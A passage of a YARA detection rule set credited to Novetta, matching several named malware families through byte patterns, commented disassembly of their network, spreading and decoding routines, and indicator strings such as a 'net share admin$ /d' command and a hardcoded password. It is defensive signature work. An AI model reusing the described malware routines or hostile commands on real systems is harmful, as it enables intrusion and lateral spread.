ebp, eax 81 E5 00 F0 FF FF and ebp, 0FFFFF000h 81 FD 00 30 00 00 cmp ebp, 3000h 75 0D jnz short loc_4019FB 8B 6C 24 18 mov ebp, [esp+10h+arg_4] 25 FF 0F 00 00 and eax, 0FFFh 03 C7 add eax, edi 01 28 add [eax], ebp */ $a = {33 C0 66 [2] 8B ?? 81 ?? 00 F0 FF FF 81 ?? 00 30 00 00 75 ?? 8B [3] 25 FF 0F 00 00 03 C7 01} condition: $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) } import "pe" rule LimaBravo { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" Source = "Mwsagent.dll" strings: /* 83 C4 34 add esp, 34h 83 FD 0A cmp ebp, 0Ah 5D pop ebp 5B pop ebx 7E 12 jle short loc_1000106F 57 push edi ; Src C6 07 4D mov byte ptr [edi], 4Dh C6 47 01 5A mov byte ptr [edi+1], 5Ah E8 97 01 00 00 call ManualImageLoad */ $a = {83 ?? 34 83 ?? 0A [0-2] 7E ?? 5? C6 ?? 4D C6 [2] 5A E8} condition: $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) } import "pe" rule LimaCharlie { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" Source_x86 = "6ee6ae79ee1502a11ece81e971a54f189a271be9ec700101a2bd7a21198b94c7" Source_x64 = "90ace24eb132c776a6d5bb0451437db21e84601495a2165d75f520af637e71e8" strings: $misspelling = "Defualt Sleep = %d" wide /* FF 76 74 push dword ptr [esi+74h] 59 pop ecx 50 push eax 8F 86 48 01 00 00 pop dword ptr [esi+148h] 85 C0 test eax, eax 51 push ecx 8F 86 44 01 00 00 pop dword ptr [esi+144h] 75 3D jnz short loc_100035F3 F6 46 56 01 test byte ptr [esi+56h], 1 74 0A jz short loc_100035C6 */ $x86 = {FF ?? 74 5? 5? 8F ?? 48 01 00 00 85 C0 5? 8F ?? 44 01 00 00 75 ?? F6 [2] 01 74} /* 48 8B 4B 70 mov rcx, [rbx+70h] 48 89 8B 60 01 00 00 mov [rbx+160h], rcx 48 89 83 68 01 00 00 mov [rbx+168h], rax 48 85 C0 test rax, rax 75 35 jnz short loc_180002372 F6 43 56 01 test byte ptr [rbx+56h], 1 74 07 jz short loc_18000234A */ $x64 = {48 [2] 70 48 [2] 60 01 00 00 48 [2] 68 01 00 00 48 85 C0 75 ?? F6 [2] 01 74} condition: $x86 in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) or $x64 in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) or $misspelling } import "pe" rule LimaDelta { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" Source = "81e6118a6d8bf8994ce93f940059217481bfd15f2757c48c589983a6af54cfcc" strings: /* 8B 69 FC mov ebp, [ecx-4] 83 C1 10 add ecx, 10h 81 F5 6D 3A 71 58 xor ebp, 58713A6Dh 89 2A mov [edx], ebp 33 ED xor ebp, ebp 66 8B 69 F0 mov bp, [ecx-10h] 89 6A 04 mov [edx+4], ebp 83 C2 08 add edx, 8 4F dec edi 75 E3 jnz short loc_4026CE */ $fileDecoder = {8B ?? ?? 83 ?? 10 81 ?? 6D 3A 71 58 89 ?? 33 ?? 66 ?? ?? F0 89 ?? 04 83 ?? 08 4? 75} /* 66 81 BC 24 A0 00 00 00 BB 01 cmp [esp+98h+arg_4], 1BBh 74 21 jz short loc_401BD7 FF 15 58 30 40 00 call ds:rand 99 cdq B9 32 00 00 00 mov ecx, 32h F7 F9 idiv ecx 8B DA mov ebx, edx 8D 54 24 5E lea edx, [esp+98h+var_3A] 53 push ebx ; dwSize 52 push edx ; pvBuffer E8 3F FB FF FF call GenerateRandomBuffer 83 C4 08 add esp, 8 83 C3 46 add ebx, 46h */ $authenicateBufferGen = {BB 01 74 ?? FF 15 [4] 99 B? 32 00 00 00 F7 ?? 8B ?? 8D [3] 5? 5? E8 [4] 83 C4 08 83 ?? 46} condition: $authenicateBufferGen in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) or $fileDecoder in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) } rule PapaAlfa { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" strings: $ = "pmsconfig.msi" wide $ = "pmslog.msi" wide $ = "%sd.e%sc n%ssh%srewa%s ad%s po%sop%sing T%s %d" $ = "CreatP2P Thread" wide $ = "GreatP2P Thread" wide condition: 3 of them } import "pe" rule RomeoAlfa { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" Source = "fba0b8bdc1be44d100ac31b864830fcc9d056f1f5ab5486384e09bd088256dd0.file2.bin" strings: /* 68 C4 94 41 00 push offset a0_0_0_0 ; "0.0.0.0" 56 push esi ; wchar_t * E8 1C B4 00 00 call _wcscpy 83 C6 28 add esi, 28h 83 C4 08 add esp, 8 81 FE E8 CD 41 00 cmp esi, offset unk_41CDE8 7C E7 jl short loc_4039DA */ $zeroIPLoader = {68 [4] 56 E8 [4] 83 C6 28 83 C4 08 81 FE [4] 7C E?} // push esi // mov esi, [esp+4+a1] // test esi, esi // jle short loc_403FEB // push edi // mov edi, ds:Sleep // push 0EA60h ; dwMilliseconds // call edi ; Sleep // dec esi // jnz short loc_403FE0 // pop edi // pop esi // retn $sleeper = {5? 8B [3] 85 ?? 7E ?? 5? 8B 3D [4] 68 [4] FF ?? 4? 75 ?? 5? 5? C3 } $xercesc = "xercesc" condition: ($sleeper in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) or $zeroIPLoader in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))) and not $xercesc } import "pe" rule RomeoBravo { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" Source = "95314a7af76ec36cfba1a02b67c2b81526a04e3b2f9b8fb9b383ffcbcc5a3d9b" strings: /* E8 D9 FC FF FF call SendData 83 C4 10 add esp, 10h 85 C0 test eax, eax 74 0A jz short loc_10003FE8 B8 02 00 00 00 mov eax, 2 5E pop esi 83 C4 18 add esp, 18h C3 retn 6A 78 push 78h ; dwTimeout 6A 01 push 1 ; fDecode 8D 54 24 18 lea edx, [esp+24h+recvData] 6A 0C push 0Ch ; dwLength 52 push edx ; pvBuffer 56 push esi ; skt E8 57 FD FF FF call RecvData 83 C4 14 add esp, 14h 85 C0 test eax, eax 74 0A jz short loc_1000400A B8 02 00 00 00 mov eax, 2 */ $a = {E8 [4] 83 C4 10 85 C0 74 ?? B? 02 00 00 00 5? 83 C4 18 C3 6A 78 6A 01 8D [3] 6A 0C 5? 5? E8 [4] 83 C4 14 85 C0 74 ?? B8 02 00 00 00} condition: $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) } import "pe" rule RomeoCharlie { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" Source = "a82108ef7115931b3fbe1fab99448c4139e22feda27c1b1d29325710671154e8" strings: $auth1 = "Success - Accept Auth" $auth2 = "Fail - Accept Auth" /* 81 E3 FF FF 00 00 and ebx, 0FFFFh 8B EB mov ebp, ebx 57 push edi C1 EE 10 shr esi, 10h 81 E5 FF FF 00 00 and ebp, 0FFFFh 8B FE mov edi, esi 8B C5 mov eax, ebp 81 E7 FF FF 00 00 and edi, 0FFFFh C1 E0 10 shl eax, 10h 6A 00 push 0 ; _DWORD 0B C7 or eax, edi 6A 00 push 0 ; _DWORD 50 push eax ; _DWORD 68 10 14 11 71 push offset sub_71111410; _DWORD 6A 00 push 0 ; _DWORD 6A 00 push 0 ; _DWORD FF 15 5C 8E 12 71 call CreateThread_0 C1 E7 10 shl edi, 10h */ $startupRelayThreads = {81 ?? FF FF 00 00 8B ?? 5? C1 ?? 10 81 ?? FF FF 00 00 8B ?? 8B ?? 81 ?? FF FF 00 00 C1 ?? 10 6A 00 0B ?? 6A 00 50 68 [4] 6A 00 6A 00 FF 15 [4] C1 ?? 10 } /* source: 641808833ad34f2e5143001c8147d779dbfd2a80a80ce0cfc81474d422882adb 25 00 20 00 00 and eax, 2000h 3D 00 20 00 00 cmp eax, 2000h 0F 94 C1 setz cl 81 E2 80 00 00 00 and edx, 80h 33 C0 xor eax, eax 80 FA 80 cmp dl, 80h 0F 94 C0 setz al 03 C8 add ecx, eax 33 D2 xor edx, edx 83 F9 01 cmp ecx, 1 */ $crypto = {2? 00 20 00 00 3? 00 20 00 00 0F [2] 81 ?? 80 00 00 00 33 ?? 80 ?? 80 0F [2] 03 ?? 33 ?? 83 ?? 01 } condition: all of ($auth*) or $startupRelayThreads in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) or $crypto in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) } import "pe" rule RomeoDelta { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" Source = "1df2af99fb3b6e31067b06df07b96d0ed0632f85111541a416da9ceda709237c" strings: /* E8 78 00 00 00 call GenerateRandomBuffer 33 C0 xor eax, eax 8A 4C 04 04 mov cl, [esp+eax+24h+buffer] 80 E9 22 sub cl, 22h 80 F1 AD xor cl, 0ADh 88 4C 04 04 mov [esp+eax+24h+buffer], cl 40 inc eax 83 F8 10 cmp eax, 10h 7C EC jl short loc_1000117A 6A 01 push 1 ; fEncode 8D 54 24 08 lea edx, [esp+28h+buffer] 6A 10 push 10h ; dwDataLength 52 push edx ; pvData 8B CB mov ecx, ebx ; this E8 A2 00 00 00 call CSocket__Send */ $loginInit = { E8 [4] 33 C0 8A [3] 80 [2] 80 [2] 88 [3] 40 83 F8 10 7C ?? 6A 01 8D [3] 6A 10 5? 8B CB E8 } condition: $loginInit in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) } import "pe" rule RomeoEcho { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" strings: $ = "%s %-20s %10lu %s" $ = "_quit" $ = "_exe" $ = "_put" $ = "_get" condition: all of them } // This rule has been modified by @mmorenog @yarules to fix some errors import "pe" rule RomeoFoxtrot { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" Source = "dropped.bin" Source_relativeCalls = "635bebe95671336865f8a546f06bf67ab836ea35795581d8a473ef2cd5ff4a7f" strings: /* C7 44 24 08 01 00 00 00 mov [esp+128h+argp], 1 8B 8C 24 30 01 00 00 mov ecx, dword ptr [esp+128h+wPort] C7 44 24 04 00 00 20 03 mov dword ptr [esp+128h+optval], 3200000h 51 push ecx ; hostshort 89 44 24 1C mov dword ptr [esp+12Ch+name.sin_addr.S_un], eax FF 15 8C 01 FF 7E call ds:htons 6A 06 push 6 ; protocol 6A 01 push 1 ; type 6A 02 push 2 ; af 66 89 44 24 22 mov [esp+134h+name.sin_port], ax 66 C7 44 24 20 02 00 mov [esp+134h+name.sin_family], 2 FF 15 84 01 FF 7E call ds:socket <--- this could be a relative call in some variants 83 F8 FF cmp eax, 0FFFFFFFFh 89 46 04 mov [esi+4], eax 0F 84 AD 00 00 00 jz loc_7EFE4C63 57 push edi 8B 3D 88 01 FF 7E mov edi, ds:setsockopt <---- this line is missing when relative calls are used 8D 54 24 08 lea edx, [esp+12Ch+optval] 6A 04 push 4 ; optlen 52 push edx ; optval 68 02 10 00 00 push 1002h ; optname 68 FF FF 00 00 push 0FFFFh ; level 50 push eax ; s FF D7 call edi ; setsockopt <--- this could be a relative call in some variants 8B 4E 04 mov ecx, [esi+4] 8D 44 24 08 lea eax, [esp+12Ch+optval] 6A 04 push 4 ; optlen 50 push eax ; optval 68 01 10 00 00 push 1001h ; optname 68 FF FF 00 00 push 0FFFFh ; level 51 push ecx ; s FF D7 call edi ; setsockopt <--- this could be a relative call in some variants */ $connect = { C7 [3] 01 00 00 00 8B [6] C7 [3] 00 00 20 03 5? 89 [3] ( FF 15 | E8 ) [4] 6A 06 6A 01 6A 02 66 [4] 66 [4] 02 00 ( FF 15 | E8 ) [4] 83 F8 FF 89 [2] 0F 84 [4] [0-7] 8D [3] 6A 04 5? 68 02 10 00 00 68 FF FF 00 00 5? ( FF D? | E8 [3] ??) 8B [2] 8D [3] 6A 04 5? 68 01 10 00 00 68 FF FF 00 00 5? ( FF D? | E8 [3] ??) } $response = "RESPONSE 200 OK!!!" condition: $response or $connect in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) } // This rule has been modified by @mmorenog // Original->$idGen = {FF 15 [4] 50 E8 [4] 83 C4 04 E8 [4] C1 ?? 10 89 [2] E8 [4] 01 [2] E8 [4] C1 ?? 10 89 [2] E8 [4]} // Final -> $idGen = {FF 15 [4] 50 E8 [4] 83 C4 04 E8 [4] C1 ?? 10 89 [2] E8 [4] 01 [2] E8 [4] C1 ?? 10 89 [2] E8 [4] ?? ?? ?? } import "pe" rule RomeoGolf { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" Source = "7322d6b9328a9c708518c99b03a4ed3aa6ba943d7b439f6b1925e6d52a1828fe" strings: /* FF 15 70 80 01 10 call ds:GetTickCount 50 push eax ; unsigned int E8 80 93 00 00 call _srand 83 C4 04 add esp, 4 E8 85 93 00 00 call _rand C1 E0 10 shl eax, 10h 89 46 0C mov [esi+0Ch], eax E8 7A 93 00 00 call _rand 01 46 0C add [esi+0Ch], eax E8 72 93 00 00 call _rand C1 E0 10 shl eax, 10h 89 46 08 mov [esi+8], eax E8 67 93 00 00 call _rand 01 46 08 add [esi+8], eax */ $idGen = {FF 15 [4] 50 E8 [4] 83 C4 04 E8 [4] C1 ?? 10 89 [2] E8 [4] 01 [2] E8 [4] C1 ?? 10 89 [2] E8 [4] ?? ?? ?? } condition: $idGen in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) } import "pe" rule RomeoHotel { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" Source_64 = "440cb3f6dd07e2f9e3d3614fd23d3863ecfc08b463b0b327eedf08504f838c90" Source_diskSpace = "1b1496f8f35d32a93c7f16ebff6e9b560a158cc6fce061491f91bc9f43ef5be4" strings: /* E8 D3 C7 00 00 call rand 44 8B ED mov r13d, ebp 44 8B E0 mov r12d, eax B8 1F 85 EB 51 mov eax, 51EB851Fh 48 8B FD mov rdi, rbp 41 F7 EC imul r12d C1 FA 05 sar edx, 5 8B CA mov ecx, edx C1 E9 1F shr ecx, 1Fh 03 D1 add edx, ecx 6B D2 64 imul edx, 64h 44 2B E2 sub r12d, edx 41 83 C4 3C add r12d, 3Ch */ $randBuff64 = {E8 [4] 44 [2] 44 [2] B? 1F 85 EB 51 48 [2] 41 [2] C1 ?? 05 8B ?? C1 ?? 1F 03 ?? 6B ?? 64 44 [2] 41 [2] 3C} /* FF 15 40 70 01 10 call ds:GetDiskFreeSpaceExA 85 C0 test eax, eax 74 34 jz short loc_10005072 8B 84 24 20 01 00 00 mov eax, [esp+11Ch+arg_0] 6A 00 push 0 99 cdq 68 00 00 10 00 push 100000h 52 push edx 50 push eax E8 4C 7C 00 00 call __allmul */ $diskSpace = {FF 15 [4] 85 C0 74 ?? 8B [6] 6A 00 99 68 00 00 10 00 5? 5? E8} $winst = "winsta0\\default" wide // this limits the overlap with RomeoGolf condition: $randBuff64 in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) or ($diskSpace in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) and $winst) } // rules specific to the winsec malware families import "pe" rule RomeoWhiskey_Two { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" Source = "a8d88714f0bc643e76163d1b8972565e78a159292d45a8218d0ad0754c8f561d" strings: /* FF 15 78 A2 00 10 call GetTickCount_9 66 8B C8 mov cx, ax // the next op is a mov or a push/pop depending on the code version 53 push ebx 8F 45 F4 pop dword ptr [ebp-0Ch] //or 89 5D F4 mov dword ptr [ebp+var_C], ebx 66 81 F1 40 1C xor cx, 1C40h 66 D1 E9 shr cx, 1 81 C1 E0 56 00 00 add ecx, 56E0h 0F B7 C9 movzx ecx, cx 0F B7 C0 movzx eax, ax 81 F1 30 32 00 00 xor ecx, 3230h C1 E0 10 shl eax, 10h 0B C8 or ecx, eax */ $a = {FF 15 [4] 66 8B C8 [3-4] 66 81 F1 40 1C 66 D1 E9 81 C1 E0 56 00 00 0F B7 C9 0F B7 C0 81 F1 30 32 00 00 C1 E0 10 0B C8 } condition: $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) } rule RomeoWhiskey_One { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" Source = "5d21e865d57e9798ac7c14a6ad09c4034d103f3ea993295dcdf8a208ea825ad7" strings: /* FF 15 D8 5B 00 10 call GetTickCount_9 0F B7 C0 movzx eax, ax 8B C8 mov ecx, eax // skipped: 6A 01 push 1 ; fDecode C1 E9 34 shr ecx, 34h <--- this value could change 81 F1 C0 F3 00 00 xor ecx, 0F3C0h <--- this value could change // skipped: 6A 04 push 4 ; dwLength C1 E0 10 shl eax, 10h 0B C8 or ecx, eax */ $a = { FF 15 [4] 0F B7 C0 8B C8 [2-4] C1 E9 ?? 81 F1 [2] 00 00 [0-2] C1 E0 10 0B C8 } condition: $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) } import "pe" rule SierraAlfa { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" Source = "4d4b17ddbcf4ce397f76cf0a2e230c9d513b23065f746a5ee2de74f447be39b9.ex_" strings: /* 8D 54 24 08 lea edx, [esp+128h+argp] 52 push edx ; argp 68 7E 66 04 80 push 8004667Eh ; cmd 56 push esi ; s E8 DB 51 00 00 call ioctlsocket 8D 44 24 14 lea eax, [esp+128h+name] 6A 10 push 10h ; namelen 50 push eax ; name 56 push esi ; s E8 C8 51 00 00 call connect 8B 8C 24 34 01 00 00 mov ecx, [esp+128h+dwTimeout] 8D 54 24 0C lea edx, [esp+128h+timeout] 52 push edx ; timeout 8D 44 24 28 lea eax, [esp+12Ch+writefds] 6A 00 push 0 ; exceptfds 50 push eax ; writefds 6A 00 push 0 ; readfds 6A 00 push 0 ; nfds 89 74 24 3C mov [esp+13Ch+writefds.fd_array], esi 89 7C 24 38 mov [esp+13Ch+writefds.fd_count], edi 89 4C 24 20 mov [esp+13Ch+timeout.tv_sec], ecx C7 44 24 24 00 00 00 00 mov [esp+13Ch+timeout.tv_usec], 0 E8 92 51 00 00 call select 33 C9 xor ecx, ecx 56 push esi ; s 85 C0 test eax, eax 0F 9F C1 setnle cl 8B F9 mov edi, ecx E8 7D 51 00 00 call closesocket */ $connectTest = {8D [3] 5? 68 7E 66 04 80 5? E8 [4] 8D [3] 6A 10 5? 5? E8 [4] 8B [6] 8D [3] 5? 8D [3] 6A 00 5? 6A 00 6A 00 89 [3] 89 [3] 89 [3] C7 [7] E8 [4] 33 ?? 5? 85 C0 0F 9F ?? 8B ?? E8} /* E8 D8 62 00 00 call rand 8B F8 mov edi, eax E8 D1 62 00 00 call rand 0F AF F8 imul edi, eax E8 C9 62 00 00 call rand 0F AF C7 imul eax, edi 99 cdq 33 C2 xor eax, edx 2B C2 sub eax, edx 33 D2 xor edx, edx F7 F6 div esi 8B FA mov edi, edx 57 push edi E8 05 13 00 00 call sub_402BD0 */ $maths = { E8 [4] 8B ?? E8 [4] 0F AF ?? E8 [4] 0F AF ?? 99 33 ?? 2B ?? 33 ?? F7 ?? 8B ?? 5? E8} $s1 = "recdiscm32.exe" $s2 = "\\\\%s\\shared$\\syswow64" $s3 = "\\\\%s\\shared$\\system32" condition: $connectTest in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) or $maths in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) or 3 of ($s*) } // Brambul related signatures import "pe" rule SierraBravo_Two { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" strings: /* .text:00403D5A mov word ptr [esi+0Eh], 0C807h .text:00403D60 mov dword ptr [esi+39h], 800000D4h .text:00403D67 mov byte ptr [edi], 0Ch <---- ignored .text:00403D6A mov word ptr [esi+25h], 0FFh .text:00403D70 mov word ptr [esi+27h], 0A4h .text:00403D76 mov word ptr [esi+29h], 4104h .text:00403D7C mov word ptr [esi+2Bh], 32h or .text:100036F9 mov word ptr [ebx+0Eh], 0C807h ---- begin ignored ----- .text:100036FF rep movsd .text:10003701 lea edi, [ebx+60h] .text:10003704 mov ecx, 9 .text:10003709 mov esi, offset aWindows2000219 ; "windows 2000 2195" ---- end ignored ----- .text:1000370E mov dword ptr [ebx+39h], 800000D4h .text:10003715 mov word ptr [ebx+25h], 0FFh .text:1000371B mov word ptr [ebx+27h], 0A4h .text:10003721 mov word ptr [ebx+29h], 4104h .text:10003727 mov word ptr [ebx+2Bh], 32h */ $smbComNegotiationPacketGen = { 66 C7 ?? 0E 07 C8 [0-32] C7 ?? 39 D4 00 00 80 [0-32] 66 C7 ?? 25 FF 00 [0-32] 66 C7 ?? 27 A4 00 [0-32] 66 C7 ?? 29 04 41 [0-32] 66 C7 ?? 2B 32 00} $lib = "!emCFgv7Xc8ItaVGN0bMf" $api1 = "!ctRHFEX5m9JnZdDfpK" $api2 = "!emCFgv7Xc8ItaVGN0bMf" $api3 = "!VWBeBxYx1nzrCkBLGQO" $pwd = "iamsorry!@1234567" condition: $smbComNegotiationPacketGen in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) or ($pwd in ((pe.sections[pe.section_index(".data")].raw_data_offset)..(pe.sections[pe.section_index(".data")].raw_data_offset + pe.sections[pe.section_index(".data")].raw_data_size)) and ($lib in ((pe.sections[pe.section_index(".data")].raw_data_offset)..(pe.sections[pe.section_index(".data")].raw_data_offset + pe.sections[pe.section_index(".data")].raw_data_size)) or $api1 in ((pe.sections[pe.section_index(".data")].raw_data_offset)..(pe.sections[pe.section_index(".data")].raw_data_offset + pe.sections[pe.section_index(".data")].raw_data_size)) or $api2 in ((pe.sections[pe.section_index(".data")].raw_data_offset)..(pe.sections[pe.section_index(".data")].raw_data_offset + pe.sections[pe.section_index(".data")].raw_data_size)) or $api3 in ((pe.sections[pe.section_index(".data")].raw_data_offset)..(pe.sections[pe.section_index(".data")].raw_data_offset + pe.sections[pe.section_index(".data")].raw_data_size)) )) } rule SierraBravo_One { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" strings: /* .text:00402A65 push 8004667Eh ; cmd .text:00402A6A push esi ; s .text:00402A6B call ioctlsocket .text:00402A70 push 32h ; dwMilliseconds .text:00402A72 mov [esp+24Ch+writefds.fd_array], esi .text:00402A79 mov [esp+24Ch+writefds.fd_count], 1 .text:00402A84 mov [esp+24Ch+timeout.tv_sec], 3 .text:00402A8C mov [esp+24Ch+timeout.tv_usec], 0 */ $spreaderSetup = {68 7E 66 04 80 5? E8 [4] 6A 32 89 B4 [5] C7 84 [5] 01 00 00 00 C7 44 [2] 03 00 00 00 C7 44 [2] 00 00 00 00 } condition: $spreaderSetup in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) } rule SierraBravo_packed { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" strings: $ = "cmd.exe /c \"net share admin$ /d\"" $ = "MAIL FROM:<" $ = ".petite" $ = "Subject: %s|%s|%s" condition: 3 of them } import "pe" rule SierraCharlie { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" Source = "f4750e1d82b08318bdc1eb6d3399dee52750250f7959a5e4f83245449f399698.bin" strings: /* 8B 0D 50 A7 56 00 mov ecx, DnsFree 81 F6 8C 3F 7C 5E xor esi, 5E7C3F8Ch 6A 01 push 1 ; _DWORD 50 push eax ; _DWORD 85 C9 test ecx, ecx 74 3A jz short loc_40580B FF D1 call ecx ; DnsFree */ $dnsResolve = { 8B 0D 50 A7 56 00 81 F6 8C 3F 7C 5E 6A 01 50 85 C9 74 3A FF D1 } $file1 = "wmplog21t.sqm" $file2 = "wmplog15r.sqm" $file3 = "wmplog09c.sqm" condition: $dnsResolve in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) or 2 of ($file*) } import "pe" rule SierraJuliettMikeOne { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" strings: $commKey = { 10 20 30 40 50 60 70 80 90 11 12 13 1A FF EE 48 } /* .text:10001850 push 7530h ; dwTimeout .text:10001855 lea eax, [esp+420h+a2] .text:10001859 push 4 ; len .text:1000185B push eax ; a2 .text:1000185C push esi ; s .text:1000185D mov dword ptr [esp+42Ch+a2], 1000h .text:10001865 call CommSendWithTimeout .text:1000186A add esp, 14h .text:1000186D cmp eax, 0FFFFFFFFh .text:10001870 jz loc_10001915 .text:10001876 lea ecx, [esp+418h+random] .text:1000187A push ecx ; a1 .text:1000187B call Generate16ByteRandomBuffer .text:10001880 push 0 ; fEncrypt .text:10001882 push 7530h ; dwTimeout */ $handshake = { 68 30 75 00 00 [4] 6A 04 5? 5? C? [3] 00 10 00 00 E8 [7] 83 F8 FF 0F 84 ?? ?? 00 00 8? [3] 5? E8 [4] 6A 00 68 30 75 00 00 } condition: $commKey in ((pe.sections[pe.section_index(".data")].raw_data_offset)..(pe.sections[pe.section_index(".data")].raw_data_offset + pe.sections[pe.section_index(".data")].raw_data_size)) and $handshake in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) } import "pe" rule RomeoJuliettMikeTwo { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" Source = "819722ba1c5b9d0b360c54cbdd3811d0cac1a9230720b3ed4815f78bcacb3653_d1ba9ba2987f59d99ce4bf09393c0521c4d1f2961c5aeed4e0bf86e78303d27c" strings: /* 81 7C 24 24 33 27 00 00 cmp [esp+1Ch+dwBytesToRead], 2733h 75 7F jnz short loc_10002B74 8D 54 24 14 lea edx, [esp+1Ch+var_8] 52 push edx ; Time FF 15 5C 11 02 10 call ds:time 8B 44 24 14 mov eax, [esp+20h+var_C] 83 C4 04 add esp, 4 8B C8 mov ecx, eax 40 inc eax 83 F9 64 cmp ecx, 64h */ $recvFunc = { 81 [3] 33 27 00 00 75 ?? 8D [3] 5? FF 15 [4] 8B [3] 83 ?? 04 8B ?? 4? 83 ?? 64 } /* E8 74 31 00 00 call GetStringByIndex 8B 7C 24 14 mov edi, [esp+0Ch+dwFuncIndex] 8B F0 mov esi, eax 57 push edi ; index E8 68 31 00 00 call GetStringByIndex 83 C4 08 add esp, 8 85 F6 test esi, esi 74 21 jz short loc_10001040 85 C0 test eax, eax 74 1D jz short loc_10001040 56 push esi ; lpLibFileName FF 15 2C 10 02 10 call ds:LoadLibraryA 57 push edi ; index 8B F0 mov esi, eax E8 4E 31 00 00 call GetStringByIndex 83 C4 04 add esp, 4 50 push eax ; lpProcName 56 push esi ; hModule FF 15 5C 10 02 10 call ds:GetProcAddress */ $apiLoader = { E8 [4] 8B [3] 8B ?? 5? E8 [4] 83 C4 08 85 ?? 74 ?? 85 C0 74 ?? 5? FF 15 [4] 5? 8B ?? E8 [4] 83 C4 04 5? 5? FF 15 } /* 68 B8 0B 00 00 push 